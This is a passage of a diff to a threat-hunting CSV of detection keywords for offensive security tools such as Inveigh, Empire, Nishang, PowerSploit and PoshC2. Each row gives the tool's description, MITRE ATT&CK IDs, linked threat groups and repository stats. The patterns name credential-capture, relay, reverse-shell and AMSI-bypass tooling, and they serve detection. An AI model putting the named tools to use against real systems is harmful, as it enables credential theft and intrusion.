Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*Inveigh.ps1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh.psd1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh.psm1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh.sln*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*inveigh_version*","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*inveigh_version*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh-Cleartext.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh-FormInput.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" 
"*Inveigh-Log.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" 
@@ -11836,16 +11989,16 @@ "*Inveigh-net*.zip*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh-NTLMv1.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh-NTLMv2.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*-InveighRelay *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-InveighRelay *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh-Relay.ps1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*inveighzero.exe*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" 
"*InvisibilityCloak.py*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","1","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "*Invisi-Shell*","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1059 - T1053 - T1027 - T1055 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","921","143","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*invoke obfuscation*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - 
Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*invoke* -Action command -Execute * -Session*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" -"*Invoke-*WDigestDowngrade.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-*WDigestDowngrade.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*invoke_obfuscation.py*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"*invoke_sessiongopher.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*invoke_sessiongopher.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*Invoke-AccessCheckForAllGroups*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForAllServicePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForAllUsers*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - 
TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" 
@@ -11858,260 +12011,262 @@ "*Invoke-ACLPwn*","offensive_tool_keyword","Invoke-ACLpwn","Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.","T1098 - T1208 - T1484 - T1486 - T1059","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/Invoke-ACLPwn","1","0","N/A","N/A","5","498","86","2022-09-15T15:13:00Z","2018-04-26T09:21:27Z" "*Invoke-ACLScanner * -Filter *","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Invoke-ACLScanner * -Name *","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" -"*invoke-aclscanner*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-ACLScanner*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration 
testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-ADCSTemplateRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-aclscanner*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-ACLScanner*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ADCSTemplateRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-ADSBackdoor*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*Invoke-ADSBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-AirstrikeAttackCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ADSBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-AirstrikeAttackCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-AllAccessChecks*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AllChecks*","offensive_tool_keyword","AD exploitation cheat sheet","Check for vulnerable programs and configs","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation 
tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-AmsiBypass*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Invoke-AmsiBypass*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-APIConnectionHijack.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AmsiBypass*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-AmsiBypass*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-APIConnectionHijack.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-ARPScan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ARPScan.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-arpscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - 